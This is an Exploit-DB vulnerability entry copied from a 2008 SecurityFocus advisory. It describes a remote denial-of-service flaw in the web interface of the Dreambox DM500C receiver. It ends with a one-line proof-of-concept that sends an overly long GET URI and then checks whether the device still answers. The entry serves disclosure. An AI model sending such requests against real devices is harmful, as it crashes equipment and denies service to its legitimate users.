Dreambox - Web Interface URI Remote Denial of Service

EDB-ID:

32305

CVE:

N/A


Author:

Marc Ruef

Type:

dos


Platform:

Hardware

Date:

2008-08-29


source: https://www.securityfocus.com/bid/30919/info

Dreambox is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected device, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

Dreambox DM500C is vulnerable; other models may also be affected. 

open|send GET http://www.example.com/aaa(...)
HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### *